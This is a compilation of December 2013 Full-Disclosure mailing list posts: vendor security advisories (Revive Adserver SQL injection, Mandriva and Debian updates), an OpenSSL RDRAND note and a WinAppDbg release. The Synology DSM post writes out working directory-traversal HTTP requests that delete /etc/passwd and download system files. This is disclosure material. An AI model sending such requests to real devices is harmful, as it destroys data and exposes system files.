[Full-disclosure] [REVIVE-SA-2013-001] Revive Adserver 3.0.2 fixes SQL injection vulnerability
Revive Adserver Security Advisory REVIVE-SA-2013-001 Advisory ID: REVIVE-SA-2013-001 CVE ID:CVE-2013-7149 Date: 2013-12-20 Security risk: Critical Applications affected: Revive Adserver Versions affected: = 3.0.1 Versions not affected: = 3.0.2 Website: http://www.revive-adserver.com/ Vulnerability: SQL injection Description --- An SQL-injection vulnerability was recently discovered and reported to the Revive Adserver team by Florian Sander. The vulnerability is known to be already exploited to gain unauthorised access to the application using brute force mechanisms, however other kind of attacks might be possible and/or already in use. The risk is rated to be critical as the most common end goal of the attackers is to spread malware to the visitors of all the websites and ad networks that the ad server is being used on. The vulnerability is also present and exploitable in OpenX Source 2.8.11 and earlier versions, potentially back to phpAdsNew 2.0.x. Details --- The XML-RPC delivery invocation script was failing to escape its input parameters in the same way the other delivery methods do, allowing attackers to inject arbitrary SQL code via the what parameter of the delivery XML-RPC methods. Also, the escaping technique used to handle such parameter in the delivery scripts was based on the addslashes PHP function and has now been upgraded to use the dedicated escaping functions for the database in use. References -- http://www.kreativrauschen.com/blog/2013/12/18/zero-day-vulnerability-in-openx-source-2-8-11-and-revive-adserver-3-0-1/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7149 Permalink - http://www.revive-adserver.com/security/REVIVE-SA-2013-001 Solution We strongly advise people to upgrade to the most recent 3.0.2 version of Revive Adserver, including those running OpenX Source or older versions of the application. In case the upgrade cannot be performed in a timely fashion, we suggest to delete the www/delivery/axmlrpc.php script (if not in use) as a temporary fix until the application is upgraded. Contact Information === The security contact for Revive Adserver can be reached at: security AT revive-adserver DOT com -- Matteo Beccati On behalf of the Revive Adserver Team http://www.revive-adserver.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Synology DSM multiple directory traversal
** Title: Synology DSM multiple directory traversal Version affected: = 4.3-3810 Vendor: Synology Discovered by: Andrea Fabrizi Email: andrea.fabr...@gmail.com Web: http://www.andreafabrizi.it Twitter: @andreaf83 Status: patched CVE: 2013-6987 ** I'm again here with a Synology DSM vulnerability. Synology DiskStation Manager (DSM) it's a Linux based operating system, used for the DiskStation and RackStation products. I found a lot of directory traversal in the FileBrowser components. This kind of vulnerability allows any authenticated user, even if not administrative, to access, create, delete, modify system and configuration files. The only countermeasure implemented against this vulnerability is the check that the path starts with a valid shared folder, so is enough to put the ../ straight after, to bypass the security check. Vulnerables CGIs: - /webapi/FileStation/html5_upload.cgi - /webapi/FileStation/file_delete.cgi - /webapi/FileStation/file_download.cgi - /webapi/FileStation/file_sharing.cgi - /webapi/FileStation/file_share.cgi - /webapi/FileStation/file_MVCP.cgi - /webapi/FileStation/file_rename.cgi Not tested all the CGI, but I guess that many others are vulnerable, so don't take my list as comprehensive. Following some examples (test is a valid folder name): - Delete /etc/passwd === POST /webapi/FileStation/file_delete.cgi HTTP/1.1 Host: 192.168.56.101:5000 X-SYNO-TOKEN: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 103 Cookie: stay_login=0; id=kjuYI0HvD92m6 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache path=/test/../../etc/passwdaccurate_progress=trueapi=SYNO.FileStation.Deletemethod=startversion=1 === - Arbitrary file download: === GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1 Host: 192.168.56.101:5000 Connection: keep-alive Authorization: Basic === 2f746573742f2e2e2f2e2e2f6574632f706173737764 - /test/../../etc/passwd - Remote file list: = POST /webapi/FileStation/file_share.cgi HTTP/1.1 Host: 192.168.56.101:5000 X-SYNO-TOKEN: Content-Length: 75 Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2 folder_path=/test/../../tmpapi=SYNO.FileStation.Listmethod=listversion=1 == Timeline: - 05/12/2013: First contact with the vendor - 06/12/2013: Vulnerability details sent to the vendor - 20/12/2013: Patch released by the vendor ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RDRAND used directly when default engines loaded in openssl-1.0.1-beta1 through openssl-1.0.1e
On Mon, Dec 16, 2013 at 7:27 PM, coderman coder...@gmail.com wrote: ... what is affected?? fortunately impacts are less than anticipated! nickm devised most concise fix: RAND_set_rand_method(RAND_SSLeay()); always after ENGINE_load_builtin_engines(). https://gitweb.torproject.org/tor.git/commitdiff/7b87003957530427eadce36ed03b4645b481a335 --- full write up is here including a BADRAND engine patch for testing: https://peertech.org/goodrand --- last but not least, notable omissions on NSA role in reqs for random number sources in Appendix E: US Government Role in Current Encryption Standards.: http://cryptome.org/2013/12/nsa-usg-crypto-role.pdf can we get a do-over? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2013:296 ] wireshark
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:296 http://www.mandriva.com/en/support/security/ ___ Package : wireshark Date: December 20, 2013 Affected: Business Server 1.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities was found and corrected in Wireshark: The dissect_sip_common function in epan/dissectors/packet-sip.c in the SIP dissector in Wireshark 1.8.x before 1.8.12 and 1.10.x before 1.10.4 does not check for empty lines, which allows remote attackers to cause a denial of service (infinite loop) via a crafted packet (CVE-2013-7112). Multiple buffer overflows in the create_ntlmssp_v2_key function in epan/dissectors/packet-ntlmssp.c in the NTLMSSP v2 dissector in Wireshark 1.8.x before 1.8.12 and 1.10.x before 1.10.4 allow remote attackers to cause a denial of service (application crash) via a long domain name in a packet (CVE-2013-7114). This advisory provides the latest version of Wireshark (1.8.12) which is not vulnerable to these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7112 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7114 http://www.wireshark.org/security/wnpa-sec-2013-66.html http://www.wireshark.org/security/wnpa-sec-2013-68.html ___ Updated Packages: Mandriva Enterprise Server 5: 05f73378571d99273650b6774682fc8e mes5/i586/dumpcap-1.8.12-0.1mdvmes5.2.i586.rpm d2aa2b554af6e1eb0c98a7dc96f1dd00 mes5/i586/libwireshark2-1.8.12-0.1mdvmes5.2.i586.rpm 4ef7825b09b59ad81bb8be8a5c3486f1 mes5/i586/libwireshark-devel-1.8.12-0.1mdvmes5.2.i586.rpm b96d187a896962e2d318a8a9cf3e6e26 mes5/i586/rawshark-1.8.12-0.1mdvmes5.2.i586.rpm 051e69463dfc3b881dd011c86730cdc5 mes5/i586/tshark-1.8.12-0.1mdvmes5.2.i586.rpm b2c7dd0593a2d496184bcbe78df8a151 mes5/i586/wireshark-1.8.12-0.1mdvmes5.2.i586.rpm 4461a1753a5305fc47fbb39a05d2 mes5/i586/wireshark-tools-1.8.12-0.1mdvmes5.2.i586.rpm f8860655ea8d1114d9c9227599d26692 mes5/SRPMS/wireshark-1.8.12-0.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: b9f1a1c7d98e15784b5fadf35f64b6f1 mes5/x86_64/dumpcap-1.8.12-0.1mdvmes5.2.x86_64.rpm eb6f8b1be3dabf8803048a09be29d960 mes5/x86_64/lib64wireshark2-1.8.12-0.1mdvmes5.2.x86_64.rpm 32158c9f5e6bd64b2f907f62d9740261 mes5/x86_64/lib64wireshark-devel-1.8.12-0.1mdvmes5.2.x86_64.rpm 4b5fbfca3a918dab1083471e8371b402 mes5/x86_64/rawshark-1.8.12-0.1mdvmes5.2.x86_64.rpm 60329cc2a6d1eba976e418efe45f34e8 mes5/x86_64/tshark-1.8.12-0.1mdvmes5.2.x86_64.rpm a51cc8861bc84d65c9d9d7314fd7940a mes5/x86_64/wireshark-1.8.12-0.1mdvmes5.2.x86_64.rpm 7d821ad8b4eb42b38e54b4a3b50c653a mes5/x86_64/wireshark-tools-1.8.12-0.1mdvmes5.2.x86_64.rpm f8860655ea8d1114d9c9227599d26692 mes5/SRPMS/wireshark-1.8.12-0.1mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: 955e0a6249c135f9b6e3b96aea2ae806 mbs1/x86_64/dumpcap-1.8.12-1.mbs1.x86_64.rpm 8c4e99d362feed33e3e95332e37a4810 mbs1/x86_64/lib64wireshark2-1.8.12-1.mbs1.x86_64.rpm 08647aa2ec96939c83386d60513f4328 mbs1/x86_64/lib64wireshark-devel-1.8.12-1.mbs1.x86_64.rpm 5edb13e8c2b09cb814057b8465bc4289 mbs1/x86_64/rawshark-1.8.12-1.mbs1.x86_64.rpm 40cd9f258b064205b1362a13c379fc37 mbs1/x86_64/tshark-1.8.12-1.mbs1.x86_64.rpm 3cca3507e5094fcf5fc190623ec1dea7 mbs1/x86_64/wireshark-1.8.12-1.mbs1.x86_64.rpm 9bc0a2917bee5c2121789436a30654b1 mbs1/x86_64/wireshark-tools-1.8.12-1.mbs1.x86_64.rpm 367f97086f4e04b3cbaeb1e59c4749eb mbs1/SRPMS/wireshark-1.8.12-1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFStBpvmqjQ0CJFipgRApSZAJ9d7itPR8M8pVrV4EvZfC8vApRlHwCfdGzm GyUAPj6/67M4WVHwrBn+8yg= =D54m -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it.
[Full-disclosure] [ MDVSA-2013:297 ] munin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:297 http://www.mandriva.com/en/support/security/ ___ Package : munin Date: December 20, 2013 Affected: Business Server 1.0 ___ Problem Description: Updated munin packages fix security vulnerabilities: The Munin::Master::Node module of munin does not properly validate certain data a node sends. A malicious node might exploit this to drive the munin-html process into an infinite loop with memory exhaustion on the munin master (CVE-2013-6048). A malicious node, with a plugin enabled using multigraph as a multigraph service name, can abort data collection for the entire node the plugin runs on (CVE-2013-6359). ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6048 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6359 http://advisories.mageia.org/MGASA-2013-0378.html ___ Updated Packages: Mandriva Business Server 1/X86_64: b20e89d5a943f0d3deadb324091ab6ef mbs1/x86_64/munin-2.0-0.rc5.3.2.mbs1.noarch.rpm 4ae6191940301c45b1ce7b32fa625122 mbs1/x86_64/munin-master-2.0-0.rc5.3.2.mbs1.noarch.rpm 3a02701b006afcd70430c4de7e96c7e8 mbs1/x86_64/munin-node-2.0-0.rc5.3.2.mbs1.noarch.rpm d07ea1401e5ab3415c2576281ec60aee mbs1/SRPMS/munin-2.0-0.rc5.3.2.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFStB67mqjQ0CJFipgRAqvjAJ9ufBj1kR8aWaw3XlBYKR6RaBCDuwCgtKPu eGZL88vNG4OY02tCGXazt58= =7+/H -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2825-1] wireshark security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2825-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff December 20, 2013 http://www.debian.org/security/faq - - Package: wireshark Vulnerability : several Problem type : local(remote) Debian-specific: no CVE ID : CVE-2013-7113 CVE-2013-7114 Laurent Butti and Garming Sam discored multiple vulnerabilities in the dissectors for NTLMSSPv2 and BSSGP, which could lead to denial of service or the execution of arbitrary code. For the stable distribution (wheezy), these problems have been fixed in version 1.8.2-5wheezy9. For the unstable distribution (sid), these problems have been fixed in version 1.10.4-1. We recommend that you upgrade your wireshark packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iEYEARECAAYFAlK0XgcACgkQXm3vHE4uylrKjgCfVTOT8kARewE6iV6onlA/gfls 9qkAoLuMZRHe52ZLhignrtWWzF5R7X/F =nXRp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2013:298 ] php
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:298 http://www.mandriva.com/en/support/security/ ___ Package : php Date: December 20, 2013 Affected: Enterprise Server 5.0 ___ Problem Description: A vulnerability has been discovered and corrected in php: The asn1_time_to_time_t function in ext/openssl/openssl.c in PHP before 5.3.28, 5.4.x before 5.4.23, and 5.5.x before 5.5.7 does not properly parse (1) notBefore and (2) notAfter timestamps in X.509 certificates, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted certificate that is not properly handled by the openssl_x509_parse function (CVE-2013-6420). The updated packages have been upgraded to the 5.3.28 version which is not vulnerable to this issue. Additionally, some packages which requires so has been rebuilt for php-5.3.28. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6420 http://www.php.net/ChangeLog-5.php#5.3.28 ___ Updated Packages: Mandriva Enterprise Server 5: e82f92ee5921854a4860d2aa6e8e6440 mes5/i586/apache-mod_php-5.3.28-0.1mdvmes5.2.i586.rpm 6bbc570aebd46f3489c86343158e77ec mes5/i586/libphp5_common5-5.3.28-0.1mdvmes5.2.i586.rpm 3e4c45f9a4e0a79c53452c17b2028b02 mes5/i586/php-apc-3.1.13-0.6mdvmes5.2.i586.rpm f6947e6a11ef29a4f4f0a07b81dd6016 mes5/i586/php-apc-admin-3.1.13-0.6mdvmes5.2.i586.rpm 4dfbe3eea5e46fd715201e4afca24c81 mes5/i586/php-bcmath-5.3.28-0.1mdvmes5.2.i586.rpm 53bbd1f4c396f167478729bd7577d862 mes5/i586/php-bz2-5.3.28-0.1mdvmes5.2.i586.rpm b4f6e07cf0cdd95931158afbc9bae331 mes5/i586/php-calendar-5.3.28-0.1mdvmes5.2.i586.rpm e2a76d50a531a01743c12bc6a9847680 mes5/i586/php-cgi-5.3.28-0.1mdvmes5.2.i586.rpm 3951910405f6e4236993377a356bb9a4 mes5/i586/php-cli-5.3.28-0.1mdvmes5.2.i586.rpm 9c18fab42a0463e6b171c89bcb34e59d mes5/i586/php-ctype-5.3.28-0.1mdvmes5.2.i586.rpm 81106282b9a8b8acbcafb503f703571f mes5/i586/php-curl-5.3.28-0.1mdvmes5.2.i586.rpm 55b58db133bc4facbc19aa8e66544194 mes5/i586/php-dba-5.3.28-0.1mdvmes5.2.i586.rpm 3af777218a08294e4db9f0185ec18408 mes5/i586/php-devel-5.3.28-0.1mdvmes5.2.i586.rpm 9740712e52b1c778865bc94f74a1f7d9 mes5/i586/php-doc-5.3.28-0.1mdvmes5.2.i586.rpm 50aba136682a5cb8b21036772e8bda91 mes5/i586/php-dom-5.3.28-0.1mdvmes5.2.i586.rpm 0676c080b0c1a0ab44755b78fa54edd2 mes5/i586/php-eaccelerator-0.9.6.1-0.12mdvmes5.2.i586.rpm 374e84efb147b96182eafba9e328c041 mes5/i586/php-eaccelerator-admin-0.9.6.1-0.12mdvmes5.2.i586.rpm 2543f2f5d65dcea79ccb42866f250033 mes5/i586/php-enchant-5.3.28-0.1mdvmes5.2.i586.rpm af59fcbaf9e89eb51b32e6fce0005c63 mes5/i586/php-exif-5.3.28-0.1mdvmes5.2.i586.rpm f0a8135c4fd701c63f9d8183d176f7a3 mes5/i586/php-fileinfo-5.3.28-0.1mdvmes5.2.i586.rpm 978ec9bad6067ee31acdb7d29c02ee6d mes5/i586/php-filter-5.3.28-0.1mdvmes5.2.i586.rpm 345bbcb9f0ff4a8f2d5b42bf80fc1aca mes5/i586/php-fpm-5.3.28-0.1mdvmes5.2.i586.rpm 9e53d96a14aaa5b321fee8c5219b179c mes5/i586/php-ftp-5.3.28-0.1mdvmes5.2.i586.rpm 2fb4464da4feed463b2e0be571b7a8ad mes5/i586/php-gd-5.3.28-0.1mdvmes5.2.i586.rpm c6fec5c8558c2d70314765a4bca56c4d mes5/i586/php-gettext-5.3.28-0.1mdvmes5.2.i586.rpm b806fa16d431e0a0bfb4536fcc5a3de0 mes5/i586/php-gmp-5.3.28-0.1mdvmes5.2.i586.rpm c97d2c1b6ee07309dd196733f115c66b mes5/i586/php-hash-5.3.28-0.1mdvmes5.2.i586.rpm 218a651d76a3f4eb342d825396970a4c mes5/i586/php-iconv-5.3.28-0.1mdvmes5.2.i586.rpm 162b43aed967096a40a8d2d8a39798b2 mes5/i586/php-imap-5.3.28-0.1mdvmes5.2.i586.rpm f74967cf95e9926a9a28493b50e564e2 mes5/i586/php-ini-5.3.28-0.1mdvmes5.2.i586.rpm bc5973f3e0a1cf0d3563d41227a4780f mes5/i586/php-intl-5.3.28-0.1mdvmes5.2.i586.rpm 8ba0dabb2dd54d90e8a813c129c5c4e9 mes5/i586/php-json-5.3.28-0.1mdvmes5.2.i586.rpm 61f0721739ea420d35ae9610cf9bfd6e mes5/i586/php-ldap-5.3.28-0.1mdvmes5.2.i586.rpm 008e485ea6cc24e40ab68ea6300a8ddf mes5/i586/php-mbstring-5.3.28-0.1mdvmes5.2.i586.rpm f85a78d805506aab05c816ce7b1cec14 mes5/i586/php-mcrypt-5.3.28-0.1mdvmes5.2.i586.rpm e9ebee4cca894eb2ce5823a382794abb mes5/i586/php-mssql-5.3.28-0.1mdvmes5.2.i586.rpm e044f3a34ef946db4063b9dbc37a757a mes5/i586/php-mysql-5.3.28-0.1mdvmes5.2.i586.rpm fbad0825f5554ec61e08b44508d3e71d mes5/i586/php-mysqli-5.3.28-0.1mdvmes5.2.i586.rpm 231d82b657e31ad7034aa350b7ed339c mes5/i586/php-mysqlnd-5.3.28-0.1mdvmes5.2.i586.rpm 25865395e9574487f5ed2a9aaaee6a6c mes5/i586/php-odbc-5.3.28-0.1mdvmes5.2.i586.rpm ef531bf3c279546d0a05f60b6f7074f5 mes5/i586/php-openssl-5.3.28-0.1mdvmes5.2.i586.rpm
[Full-disclosure] WinAppDbg 1.5 is out!
What is WinAppDbg? == The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for this purposes. Current features also include disassembling x86/x64 native code, debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing. What's new in this version? === In a nutshell... * full 64-bit support (including function hooks!) * added support for Windows Vista and above. * database code migrated to SQLAlchemy, tested on: + MySQL + SQLite 3 + Microsoft SQL Server should work on other servers too (let me know if it doesn't!) * added integration with more disassemblers: + BeaEngine: http://www.beaengine.org/ + Capstone: http://capstone-engine.org/ + Libdisassemble: http://www.immunitysec.com/resources-freesoftware.shtml + PyDasm: https://code.google.com/p/libdasm/ * added support for postmortem (just-in-time) debugging * added support for deferred breakpoints * now fully supports manipulating and debugging system services * the interactive command-line debugger is now launchable from your scripts (thanks Zen One for the idea!) * more UAC-friendly, only requests the privileges it needs before any action * added functions to work with UAC and different privilege levels, so it's now possible to run debugees with lower privileges than the debugger * added memory search and registry search support * added string extraction functionality * added functions to work with DEP settings * added a new event handler, EventSift, that can greatly simplify coding a debugger script to run multiple targets at the same time * added new utility functions to work with colored console output * several improvements to the Crash Logger tool * integration with already open debugging sessions from other libraries is now possible * improvements to the Process and GUI instrumentation functionality * implemented more anti-antidebug tricks * more tools and code examples, and improvements to the existing ones * more Win32 API wrappers * lots of miscellaneous improvements, more documentation and bugfixes as usual! Where can I find WinAppDbg? === Project homepage: - http://winappdbg.sourceforge.net/ Download links: --- Windows installer (32 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.win32.msi/download Windows installer (64 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.win-amd64.msi/download Source code http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.zip/download Documentation: -- Online http://winappdbg.sourceforge.net/doc/v1.5/tutorial http://winappdbg.sourceforge.net/doc/v1.5/reference Windows Help http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.chm/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.chm/download HTML format (offline) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.chm/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.chm/download PDF format (suitable for printing) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.pdf/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.pdf/download Acknowledgements Acknowledgements go to Arthur Gerkis, Chris Dietrich, Felipe Manzano, Francisco Falcon, @Ivanlef0u, Jean Sigwald, John Hernandez, Jun Koi, Michael Hale Ligh, Nahuel Riva, Peter Van Eeckhoutte, Randall Walls, Thierry Franzetti, Thomas Caplin, and many others I'm probably forgetting, who helped find and fix bugs in the almost eternal beta of WinAppDbg 1.5! ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/